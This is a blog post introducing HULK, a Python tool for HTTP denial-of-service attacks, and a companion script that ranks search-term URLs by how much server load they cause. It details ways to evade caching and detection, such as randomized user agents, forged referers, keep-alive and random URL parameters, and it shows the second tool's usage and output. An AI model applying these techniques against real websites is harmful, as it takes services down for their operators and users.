HULK, Web Server DoS Tool

Introducing HULK (Http Unbearable Load King).1-twitter-dos-data

In my line of work, I get to see tons of different nifty hacking tools, and traffic generation tools that are meant to either break and steal information off a system, or exhaust its resource pool, rendering the service dead and putting the system under a denial of service.

For a while now, I have been playing with some of the more exotic tools, finding that their main problem is always the same… they create repeatable patterns. too easy to predict the next request that is coming, and therefor mitigate. Some, although elegant, lack the horsepower to really put a system on its knees.

For research purposes, I decided to take some of the lessons I’ve learned over time and practice what I preach.

Enforcing Python’s engines, I wrote a script that generates some nicely crafted unique Http requests, one after the other, generating a fair load on a webserver, eventually exhausting it of resources. this can be optimized much much further, but as a proof of concept and generic guidance it does its job.

As a guideline, the main concept of HULK, is to generate Unique requests for each and every request generated, thus avoiding/bypassing caching engines and effecting directly on the server’s load itself.

I have published it to Packet Storm, as we do.

Some Techniques

  • Obfuscation of Source Client – this is done by using a list of known User Agents, and for every request that is constructed, the User Agent is a random value out of the known list
  • Reference Forgery – the referer that points at the request is obfuscated and points into either the host itself or some major prelisted websites.
  • Stickiness – using some standard Http command to try and ask the server to maintain open connections by using Keep-Alive with variable time window
  • no-cache – this is a given, but by asking the HTTP server for no-cache , a server that is not behind a dedicated caching service will present a unique page.
  • Unique Transformation of URL – to eliminate caching and other optimization tools, I crafted custom parameter names and values and they are randomized and attached to each request, rendering it to be Unique, causing the server to process the response on each event.


Basically my test web server with 4gb of Ram running Microsoft IIS7 was brought to its knees under less than a minute, running all requests from a single host.

In the pictures below you can see the tool in action, where it first ( #1 ) executed against a URL, and then the tool starts generating a load of unique requests and sending over the target server ( host of the URL ), and second ( #2 ) we can see that the server at some point starts failing to respond since it has exhausted its resource pool.


Note the “safe” word is meant to kill the process after all threads got a 500 error, since its easier to control in a lab, it is optional.


File : ( via Packetstorm )

The tool is meant for educational purposes only, and should not be used for malicious activity of any kind.


[ Edit 25nov2012 : changed download link to packetstorm ]

Finding the best Web DoS Attack Url


To establish common ground, I would like to start by explaining some theory behind DoS attacks on the HTTP attack vector.

An HTTP DoS attack is usually not based on a vulnerability or known flaw in a web server or a service, instead – its the attempt to bring a server down by using all of its available resources and its service pool. That being said, the common HTTP DoS tools usually operate by generating massive amounts of requests to a specific set of URLs on a website in order to choke the resource pool and denying the service.

One very important element in the process, is locating the “Perfect URL”, which is the URL that causes the most load on the server when requested, requiring the server to process as much data as possible before presenting the output to the client. and because of that, the best vector is always to go for the website’s search engine, since that will always require some computation power.


What i came to realize is that a simple engine can be written, to run a dictionary against a search engine, and by observing the amount of results presented back from the website for each keyword, one can determine using an automated tool – which is the best search term to create the most load on the server, and build the DoS URL based on that.

Ready, Get Set,  Go!

Lets break the idea into what we want to achieve. we want to run multiple requests to a web server on the search URL. Then, we want to run dictionary as the search term, and by parsing the response page for the place where the number of results is returned – to find the phrase that returns most results (max) and crown it as the “Perfect URL” for a DoS attack.

Using Python, I wrote such a tool that gets as input : search url, regex for finding the number of results and a dictionary file, and does what i wrote above, multithreaded of course ).

Usage looks something like :

python 'results\s\:\s(\d+)' wordlist.txt

The tool then opens several threads, each asking for a word out of the dictionary, and adds it to the search string. It then looks for the Regular Expression in the result page and grabs the number of results. Finally, it shows as output, the best URL that produced the highest number of results so far.

Looks something like this :

python 'results\s\:\s(\d+)' dictionary.txt
-- Loading Dictionary --
-- Loading Complete --
WORD:tree COUNT:13454 URL:
WORD:woman COUNT:110565 URL:
WORD:man COUNT:203721 URL:

As you can see. the result indicated that the word “man” has produced the most search results ( 203721 ) , and therefore the best URL to run an HTTP DoS attack against this site will be 

In a DoS attack scheme, this kind of tool will/should be used as part of the Reconnaissance phase, detecting a good attack URL ( or URLs ) and then running a DoS tool against it.


I am sharing this as an educational tool, designed to only be used in lab environment and not in the wild, its is meant for research purposes only and any malicious usage of this tool is prohibited.

File : ( zip file )